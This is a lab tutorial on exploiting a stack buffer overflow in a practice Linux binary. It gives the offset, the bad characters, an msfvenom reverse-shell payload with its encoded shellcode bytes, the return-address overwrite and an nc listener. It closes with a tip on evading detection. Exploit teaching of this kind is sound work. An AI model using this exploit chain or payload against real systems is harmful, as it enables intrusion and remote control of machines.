Buffer Overflow - Day Two - Code Execution

Setup

We need to install several tools:

Install metasploit:

sudo snap install metasploit-framework

Install ruby:

sudo snap install ruby --classic

gem install --user-install rex-text

Install git if needed:

sudo apt install git

Clone the metasploit repository:

git clone https://github.com/rapid7/metasploit-framework.git

Move the repository to its proper place:

sudo mv metasploit-framework/ /usr/share/

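To make our lives easier, we’ll also install Python 2.7. Its print statement writes string escapes such as \xff to stdout as raw bytes, without the text encoding that Python 3 applies. That is less safe in general, but it is exactly what we need when building payloads.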
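To illustrate the raw-bytes point, here is a minimal Python 3 sketch (not part of the original walkthrough) showing what happens to the byte 0xff when it is treated as text, and one way to write it unencoded. The helper name emit_raw is hypothetical.

```python
# Sketch (Python 3): why the walkthrough prefers python2.7 for raw bytes.
# In Python 3 a str holds Unicode code points, so printing "\xff" encodes it
# first (UTF-8 under a typical locale), which turns one byte into two.
import sys

as_text = "\xff"                      # one code point, U+00FF
utf8_bytes = as_text.encode("utf-8")  # two bytes once encoded
raw_bytes = b"\xff"                   # a single byte, as Python 2's print would emit


def emit_raw(data: bytes) -> None:
    """Hypothetical helper: write bytes to stdout with no text encoding."""
    sys.stdout.buffer.write(data)
    sys.stdout.flush()
```

With Python 3, something like emit_raw(b"\x55" * 1036 + b"\x66" * 4) would be the rough equivalent of the python2.7 print calls used in the rest of this page.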


sudo apt update

wget http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/python2.7_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/libpython2.7-stdlib_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/python2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/libpython2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb

sudo apt install ./libpython2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb ./libpython2.7-stdlib_2.7.18-13ubuntu1.5_amd64.deb ./python2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb ./python2.7_2.7.18-13ubuntu1.5_amd64.deb

After this, we can confirm that it’s been installed correctly by checking the version:

python2.7 --version

Determining The Offset

The offset tells us how many bytes it takes to fill the buffer and reach the saved return address (the value that ends up in the EIP), and therefore how much space we have for our shellcode.

Shellcode is machine code containing the instructions we want the CPU to execute. Writing shellcode by hand is covered in more detail in other modules. To save time for now, we’ll use the Metasploit Framework (MSF), which ships a Ruby script called “pattern_create” that helps us determine the exact number of bytes needed to reach the EIP. It generates a non-repeating string of the length you specify.

From the Metasploit checkout we just installed, we’ll run that script to create a unique string and feed it to the program to find where the EIP overwrite begins.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1200 > pattern.txt

cat pattern.txt

This is the pattern we’ll feed into the program.

To do this, we’ll start gdb:

gdb -q bow32

Then we can run a print command similar to the one we used on Tuesday. This time, though, we’ll feed in the string we just generated instead of 1200 U’s.

(gdb) run $(python2.7 -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5..<truncated>..Bn7Bn8Bn9'")

At the bottom of the output we’ll see that the program still crashed. This time, however, the EIP holds a value taken from our pattern, which is not a valid address.

We can confirm this by using gdb to inspect the eip register:

(gdb) info registers eip

Copy the value into a notepad for the next step. In my case: 0x69423569

Now we can use another Ruby script provided by Metasploit to calculate the offset based on that value.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x69423569

Under the hood, the script converts the hex value back into its four ASCII characters (in little-endian byte order) and looks up their position in the pattern string we used. We see that it’s an offset of 1036.

We can confirm that this is the correct offset by writing our own data directly into the EIP register. We’ll append 4 “f” characters, which are 0x66 in hex.
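The lookup can be reproduced in a few lines of Python 3. This is a rough sketch of the idea, not Metasploit’s actual implementation: it assumes the pattern is built from uppercase, lowercase, and digit triples (as the Aa0Aa1Aa2... output suggests), and the function names are chosen here for illustration.

```python
# Sketch: rebuild the cyclic pattern and look up where an EIP value falls in it.
import string
from itertools import product


def pattern_create(length: int) -> str:
    """Build 'Aa0Aa1Aa2...' triples (digit cycles fastest) up to `length` chars."""
    chunks = []
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(eip_value: int, length: int = 1200) -> int:
    """Return the index of the 4 bytes found in EIP, or -1 if not present."""
    # EIP was loaded from memory in little-endian order, so undo that first.
    needle = eip_value.to_bytes(4, "little").decode("latin-1")
    return pattern_create(length).find(needle)


print(pattern_offset(0x69423569))  # prints 1036
```

Here 0x69423569 unpacks to the characters "i5Bi", which first appear at index 1036 of the 1200-character pattern.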

# First start gdb with the bow32 binary
gdb -q bow32

# run the binary but this time, we'll print 1036 U's and then 4 f's to fill the EIP register.
(gdb) run $(python2.7 -c "print '\x55' * 1036 + '\x66' * 4")

We can again confirm by printing the values in the EIP register:

(gdb) info registers eip

Determining the length for shell code

We first need to generate shellcode in order to determine its size. We can use another tool that is bundled with Metasploit called msfvenom. This tool generates payloads for a wide variety of operating systems using a wide range of methods.

In this instance, we’ll use a payload that opens a reverse shell over TCP. When executed, it will connect back to our local host (127.0.0.1) on port 31337. It targets the Linux platform on the x86 architecture, and we want the output formatted as C code.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 --platform linux --arch x86 --format c

We can see that our payload will end up being 68 bytes in size.

Based on this, we can calculate the total size we need. As a precaution, we should reserve more space than the current 68 bytes in case the shellcode grows once we refine it later.

Often it can be useful to insert some no operation instructions (NOPs) before our shellcode begins so that it can be executed cleanly. Let us briefly summarize what we need for this:

We need a total of 1040 bytes to get to the EIP.
Here, we can use an additional 100 bytes of NOPs
150 bytes for our shellcode.

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
     NOPs = "\x90" * 100
Shellcode = "\x44" * 150
      EIP = "\x66" * 4

Using this math, we can craft our payload to confirm the amount of space we have to utilize:

(gdb) run $(python2.7 -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')

With this, we confirmed that our shellcode could grow to a total of 250 bytes, because as the shellcode grows, it’ll simply eat into the NOPs that precede it.
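The arithmetic above can be checked with a small Python 3 sketch. The function name layout and the dictionary keys are made up for this example; the numbers (1040 total, 100 NOPs, 150 bytes reserved for shellcode, 4 bytes for the EIP) are the ones used in this section.

```python
# Sketch: compute how much filler is needed so the sections add up to 1040 bytes.
TOTAL = 1040  # 1036 bytes of offset plus the 4 bytes that land in EIP


def layout(total: int, nops: int, shellcode: int, eip: int = 4) -> dict:
    """Return the size of each section; raise if the sections do not fit."""
    padding = total - nops - shellcode - eip
    if padding < 0:
        raise ValueError("NOPs + shellcode + EIP exceed the available space")
    return {"padding": padding, "nops": nops, "shellcode": shellcode, "eip": eip}


sizes = layout(TOTAL, nops=100, shellcode=150)

# Placeholder bytes only: 0x55 filler, 0x90 NOPs, 0x44 stand-in, 0x66 marker.
test_payload = (
    b"\x55" * sizes["padding"]
    + b"\x90" * sizes["nops"]
    + b"\x44" * sizes["shellcode"]
    + b"\x66" * sizes["eip"]
)

print(sizes["padding"], len(test_payload))  # prints 786 1040
```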

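Identifying Bad Characters

Bad characters are bytes that the target program, or the way the input reaches it, treats specially (string terminators, whitespace, and similar delimiters). They cannot appear in our payload, because the payload would be truncated or altered and the exploit would fail.

To start, we need a list of every possible byte value, each of which is a candidate bad character: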

CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

This list is 256 bytes long.

We’re going to send this list to our program and then inspect the memory, so we need to shrink our buffer padding by that number of characters.

Buffer = "\x55" * (1040 - 256 - 4) = 780
 CHARS = "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfd\xfe\xff"
   EIP = "\x66" * 4

The new size of our buffer is 780
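Rather than typing the list by hand, it can be generated. The following Python 3 sketch builds all 256 byte values and recomputes the padding length; the helper as_escaped is a hypothetical name, and its output is meant to be pasted into the python2.7 one-liner.

```python
# Sketch: generate the full candidate list and the matching padding length.
all_bytes = bytes(range(256))  # 0x00 through 0xff, 256 values in total

# 1040 bytes reach the end of EIP; 4 of them are the EIP marker itself.
padding_len = 1040 - len(all_bytes) - 4


def as_escaped(data: bytes) -> str:
    """Format bytes as a \\xNN string suitable for pasting into a shell command."""
    return "".join("\\x%02x" % value for value in data)


print(len(all_bytes), padding_len)  # prints 256 780
print(as_escaped(all_bytes[:6]))    # prints \x00\x01\x02\x03\x04\x05
```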

In order to actually inspect the memory, we need to set a breakpoint on the bowfunc function.

(gdb) break bowfunc

Now we can send our payload

(gdb) run $(python2.7 -c 'print "\x55" * (1040 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

We’ll see that execution stops at the breakpoint we set.

From here, we want to inspect the memory to look for any bytes that were removed.

(gdb) x/2000xb $esp+500

What this command is saying is:

x - Examine memory
/2000 - Show 2000 items
x - print each item in hex
b - display the items in 1 byte chunks
$esp+500 - start displaying items at ESP +500

This starts displaying the memory. gdb pages long output, so press c + Enter to print the rest without paging.

What we’re looking for is the whole run of 0x55 bytes.

At the end of this section is where our character list starts.

Looking at this list, we’ll see that the first value, 0x00, is missing. This is because 0x00 is a null byte, which terminates C strings and is almost always a bad character.

With this information, we’ll remove that byte from our list, decrement our count by 1 (256 becomes 255), and try the command again.

run $(python2.7 -c 'print "\x55" * (1040 - 255 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

Inspecting the memory again, we see that the next missing value is 0x09.

So we’ll again remove this from our list and decrement the count:

run $(python2.7 -c 'print "\x55" * (1040 - 254 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

This time you’ll notice that 0x0a is missing.

Repeat this until no more values are missing. Each value you remove is one that would corrupt or cut short the payload.

run $(python2.7 -c 'print "\x55" * (1040 - 253 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

0x20 is missing now.

As a hint, this is the last bad character, and we can stop.

The identified bad characters are:

\x00 \x09 \x0a \x20
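The remove-and-retry loop can be sketched in Python 3 as follows. Both function names are hypothetical, and the "seen" bytes in the usage line are toy data standing in for what you would read out of the gdb memory dump.

```python
# Sketch: build the next candidate list and spot the first byte that went missing.
KNOWN_BAD = b"\x00\x09\x0a\x20"  # the bad characters identified above


def candidate_bytes(bad: bytes) -> bytes:
    """All 256 byte values except the ones already known to be bad."""
    return bytes(value for value in range(256) if value not in bad)


def first_missing(sent: bytes, seen: bytes):
    """Return the first sent byte that memory does not show intact, else None."""
    for index, value in enumerate(sent):
        if index >= len(seen) or seen[index] != value:
            return value
    return None


remaining = candidate_bytes(KNOWN_BAD)
padding_len = 1040 - len(remaining) - 4  # filler needed for the next run

print(len(remaining), padding_len)                       # prints 252 784
print(first_missing(b"\x01\x02\x03", b"\x01\x02\x00"))   # prints 3
```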

Generating our shellcode

Now that we’ve calculated our offset and identified the bad characters, we can generate our shellcode. This is the actual code that will be executed in the buffer overflow attack.

We’re going to use msfvenom, like before, and just pass it an additional flag containing our bad characters:

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

This saves the shellcode in a file called shellcode. To copy and paste it, we need to open the file and join the shellcode into a single string.

code shellcode

We can now send this payload to our program, essentially as a dry run. The encoded shellcode is 95 bytes here, and we place 124 NOPs in front of it:

run $(python2.7 -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xda\xc6\xb8\x9b\xc8\xb8\xc8\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x12\x31\x47\x17\x03\x47\x17\x83\x5c\xcc\x5a\x3d\x53\x16\x6d\x5d\xc0\xeb\xc1\xc8\xe4\x62\x04\xbc\x8e\xb9\x47\x2e\x17\xf2\x77\x9c\x27\xbb\xfe\xe7\x4f\x43\x01\x18\x8e\xd3\x03\x18\xea\x4a\x8d\xf9\xba\xeb\xdd\xa8\xe9\x40\xde\xc3\xec\x6a\x61\x81\x86\x1a\x4d\x55\x3e\x8b\xbe\xb6\xdc\x22\x48\x2b\x72\xe6\xc3\x4d\xc2\x03\x19\x0d" + "\x66" * 4')

When we inspect the memory again, we can see that our shellcode now sits intact in the buffer area of the memory.

x/2000xb $esp+550

We’ll look for the 0x55 bytes, then the 0x90 bytes, and then the start of our shellcode.

Choosing a return address

The last step in this flow is to pick a return address. Instead of placing \x66 bytes into the EIP, we’ll place this address there.

This address needs to be located inside the NOP area. When the function returns, the address is loaded into the EIP, so the CPU jumps to that location and executes the bytes from there in order. It slides through the NOP bytes (they are literally No Operation instructions) and then executes our shellcode.

Note that it doesn’t really matter which address in the NOP section you choose, as long as none of its bytes is a bad character. You can just pick one in the middle. In my case, I’m choosing: 0xffffd102

Note that x86 uses the little-endian format, so we need to write the address bytes in reverse order:

\x02 \xd1 \xff \xff
\x02\xd1\xff\xff
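The byte reversal can be double-checked with Python 3’s struct module. This is a small sketch using the address chosen above; the variable names are illustrative.

```python
# Sketch: pack the chosen return address as a 32-bit little-endian value.
import struct

BAD_CHARS = b"\x00\x09\x0a\x20"  # bad characters identified earlier
return_address = 0xFFFFD102      # address picked inside the NOP area

packed = struct.pack("<I", return_address)  # "<I" = little-endian unsigned 32-bit

# The address itself must not contain any bad character either.
contains_bad = any(value in BAD_CHARS for value in packed)

print(packed.hex(), contains_bad)  # prints 02d1ffff False
```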

So our new full command, with the EIP replaced, is going to be:

run $(python2.7 -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xda\xc6\xb8\x9b\xc8\xb8\xc8\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x12\x31\x47\x17\x03\x47\x17\x83\x5c\xcc\x5a\x3d\x53\x16\x6d\x5d\xc0\xeb\xc1\xc8\xe4\x62\x04\xbc\x8e\xb9\x47\x2e\x17\xf2\x77\x9c\x27\xbb\xfe\xe7\x4f\x43\x01\x18\x8e\xd3\x03\x18\xea\x4a\x8d\xf9\xba\xeb\xdd\xa8\xe9\x40\xde\xc3\xec\x6a\x61\x81\x86\x1a\x4d\x55\x3e\x8b\xbe\xb6\xdc\x22\x48\x2b\x72\xe6\xc3\x4d\xc2\x03\x19\x0d" + "\x02\xd1\xff\xff"')

Before executing this, however, we need to start our reverse shell listener so that there is something to catch the connection. We’ll use netcat for this:

nc -nlvp 31337

Now we can execute our payload in gdb.

If you haven’t exited gdb since we set the breakpoint, you’ll likely hit it again. Just type continue and press Enter, and the program will carry on:

(gdb) continue

If you check our netcat listener, you’ll see that we have received a connection.

You can now run commands, as an example:

id

Close the shell using Ctrl + C. In gdb you’ll see that the program continues as normal. Up until that point, the program was essentially paused at the point of shell execution. In a real exploitation scenario, you’ll likely have to write shellcode that spawns a new process and migrates the shell to that process before allowing the program to continue. You’d want this done quickly in order to avoid detection.